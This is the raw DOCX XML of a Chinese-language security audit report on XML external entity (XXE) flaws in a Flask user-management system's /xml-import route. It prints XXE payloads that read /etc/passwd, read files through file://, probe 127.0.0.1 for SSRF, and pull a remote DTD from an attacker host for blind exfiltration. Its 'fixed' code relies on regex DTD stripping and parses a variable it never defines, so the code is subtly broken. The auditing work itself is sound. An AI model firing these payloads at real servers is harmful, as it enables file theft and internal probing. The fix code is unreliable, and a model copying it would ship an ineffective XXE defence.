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color w:val="1A2B3C"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>XXE 外部实体注入</w:t>
        <w:br/>
        <w:t>漏洞审查与修复报告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文档编号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SEC-XXE-2025-001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密级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内部公开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版本号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V1.0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发布日期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2026-07-16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编制人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潘麒宇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1. 审计概述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1.1 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项目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系统名称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用户管理系统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审计范围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XML 数据导入功能（/xml-import 路由 + XML解析）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审计日期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2026 年 7 月 16 日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技术栈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Python 3 / Flask 3.x / xml.etree.ElementTree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1.2 审计方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="2C2C2C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  * 代码审计：逐行审查 xml_import 路由的 XML 处理逻辑，定位 DTD 实体注入点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="2C2C2C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  * 黑盒渗透：构造 20+ 种 XXE Payload 验证文件读取、SSRF 等攻击路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="2C2C2C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  * 参考标准：OWASP Top 10 A05:2021 / CWE-611</w:t>
      </w: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1.3 参考标准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标准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适用范围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OWASP Top 10 2021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A05:2021 安全配置错误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CWE-611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XML 外部实体处理限制不当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2. 漏洞发现清单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2.1 漏洞总览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编号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漏洞名称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等级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所在路由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漏洞类型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本地文件读取（/etc/passwd）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/xml-import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CWE-611 XXE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XXE-02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file:// 协议读取任意文件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/xml-import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CWE-611 XXE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XXE-03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 SSRF 探测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/xml-import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CWE-918 SSRF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XXE-04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远程 DTD 引用（盲注）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/xml-import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CWE-611 XXE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XXE-05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参数实体调用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/xml-import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CWE-611 XXE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2.2 风险分布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等级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数量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3个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60%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2个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40%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合计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5个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100%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3. 单漏洞深度分析与修复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3.1 XXE-01：本地文件读取（/etc/passwd）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XXE-01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app.py:831-845 xml_import() — 直接解析含 DTD 的 XML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9.1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攻击者读取服务器任意文件。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1. 提交含 DTD 的 XML 数据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2. &lt;!ENTITY xxe SYSTEM "/etc/passwd"&gt;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3. &amp;xxe; 引用处显示文件内容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4. 系统密码文件返回到页面上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攻击载荷：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&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "/etc/passwd"&gt;]&gt;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&lt;users&gt;&lt;user name="&amp;xxe;"&gt;...&lt;/user&gt;&lt;/users&gt;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修复：剥离 DTD 声明（&lt;!DOCTYPE...&gt;），阻止实体定义执行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3.2 XXE-02：file:// 协议读取任意文件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XXE-02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app.py:840 — open(filepath) 无协议校验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9.1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攻击者读取任意系统文件。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同 XXE-01，但使用 file:// 协议。可读取任意文件。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修复：DTD 剥离同样阻止 file:// 协议实体。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3.3 XXE-03：内网 SSRF 探测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XXE-03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app.py:840 — open(filepath) 不校验目标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8.6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可探测内网服务。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构造 SYSTEM "http://127.0.0.1:5000/" 探测内网服务。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修复：DTD 剥离阻止 SYSTEM URL。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3.4 XXE-04：远程 DTD 引用（盲注） [中危]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XXE-04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app.py:847 — 解析含外部引用的 XML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6.5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攻击者可进行带外数据泄露。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&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"&gt; %xxe;]&gt;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修复：DTD 剥离阻止外部引用。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3.5 XXE-05：参数实体调用 [中危]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XXE-05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app.py:847 — 未过滤参数实体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5.3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放大攻击。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% 参数实体可在 DTD 内部调用，造成多次解析。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修复：DTD 剥离一并移除参数实体定义。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4. 修复后核心代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D0D5DD"/>
        </w:pBdr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修复后 /xml-import 核心安全逻辑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# [安全] 三步剥离 DTD，防止 XXE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# 第1步：剥离 &lt;!DOCTYPE ... ]&gt; 完整声明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xml_data = re.sub(r"&lt;!DOCTYPE[^]]*]&gt;", "", xml_data, flags=re.DOTALL)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# 第2步：剥离残留的 &lt;!ENTITY 定义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xml_data = re.sub(r"&lt;!ENTITY[^&gt;]*&gt;", "", xml_data)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# 第3步：剥离未定义实体引用 &amp;xxx;（保留标准实体 &amp;amp;&amp;lt;&amp;gt;&amp;quot;&amp;apos;）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xml_data = re.sub(r"&amp;(?!(?:amp|lt|gt|quot|apos);)\w+;", "", xml_data)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# 用纯净 XML 进行解析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import xml.etree.ElementTree as ET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root = ET.fromstring(xml_data_no_dtd)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5. 修复验证结论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D0D5D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测试项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攻击载荷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修复前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修复后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结论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正常 XML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&lt;users&gt;&lt;user&gt;...&lt;/user&gt;&lt;/users&gt;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正常解析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正常解析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 /etc/passwd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!ENTITY xxe SYSTEM "/etc/passwd"[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读取文件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DTD剥离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 file://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!ENTITY xxe SYSTEM "file:///etc/passwd"[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读取文件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DTD剥离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XXE SSRF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!ENTITY xxe SYSTEM "http://127.0.0.1:5000"[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可请求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DTD剥离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标准实体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&amp;amp; &amp;lt; &amp;gt;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正确保留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正确保留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未登录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直接 POST /xml-import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可访问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401 拒绝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</w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:color w:val="1A2B3C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>—— 报告结束 ——</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="8C8C8C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>本报告由安全审计组基于对用户管理系统 XML 数据导入功能的代码审计与渗透测试数据汇编。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